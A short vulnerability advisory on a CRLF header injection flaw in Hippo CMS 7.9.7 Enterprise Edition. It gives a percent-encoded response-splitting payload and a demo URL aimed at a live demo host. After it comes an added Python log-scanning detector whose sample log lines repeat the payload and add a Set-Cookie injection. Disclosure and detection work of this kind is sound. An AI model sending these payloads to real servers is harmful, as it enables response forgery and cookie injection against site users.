Hippo CMS version 7.9.7 Enterprise Edition suffers from a CRLF header injection vulnerability.
# Affected software: Hippo CMS
# Type of vulnerability: CRLF
# URL: https://cms.demo.onehippo.com
# Discovered by: provensec
# Website: provensec.com
# Version: CMS 7.9.7 Enterprise Edition
# Proof of concept
Payload:
advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20ding dong</html>
Demo:
https://cms.demo.onehippo.com/?0&advanced%0D%0AContent-Length:+0%0D%0A%0D%0AHTTP/1.1+200+OK%0D%0AContent-Type:+text/html%0D%0AContent-Length:+35%0D%0A%0D%0A%3Chtml%3ESorry,+System+Down%3C/html%3E
Screenshot: http://prntscr.com/6rxb6l
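
Detection sketch for the request shape shown in the proof of concept: an added example, not part of the original advisory or of Hippo CMS. It percent-decodes request targets from access logs (including double encoding) and flags a CR/LF that is followed by a header name or a second status line. The function names, the combined log format and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# A header name or a second status line directly after an injected line break.
INJECTED = re.compile(r"[\r\n]+\s*(HTTP/\d\.\d\s+\d{3}|[A-Za-z][A-Za-z0-9-]*\s*:)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')

def decode_layers(value, max_rounds=3):
    """Percent-decode repeatedly so %250d%250a (double encoding) is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return 'splitting', 'crlf' or None for a request target (path + query)."""
    decoded = decode_layers(target.replace("+", " "))
    if "\r" not in decoded and "\n" not in decoded:
        return None
    # CR/LF followed by a header name or status line: response-splitting shape.
    return "splitting" if INJECTED.search(decoded) else "crlf"

def scan(log_lines):
    """Return (line_number, verdict, target) for each suspicious log entry."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        verdict = classify(match.group(1))
        if verdict:
            hits.append((number, verdict, match.group(1)))
    return hits

# Constructed sample log lines (combined log format); clients and times are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2015:10:00:00 +0000] "GET /?0&advanced HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Apr/2015:10:00:05 +0000] "GET /?0&advanced%0D%0AContent-Length:+0%0D%0A%0D%0AHTTP/1.1+200+OK HTTP/1.1" 200 35',
    '203.0.113.9 - - [10/Apr/2015:10:00:09 +0000] "GET /?q=a%250d%250aSet-Cookie:%20x=1 HTTP/1.1" 200 90',
    '203.0.113.7 - - [10/Apr/2015:10:00:12 +0000] "GET /search?q=line1%0Aline2 HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for number, verdict, target in scan(SAMPLE_LOG):
        print(number, verdict, target)
```

The same CR/LF test applied to any request-derived value before it is written into a response header is the corresponding server-side control.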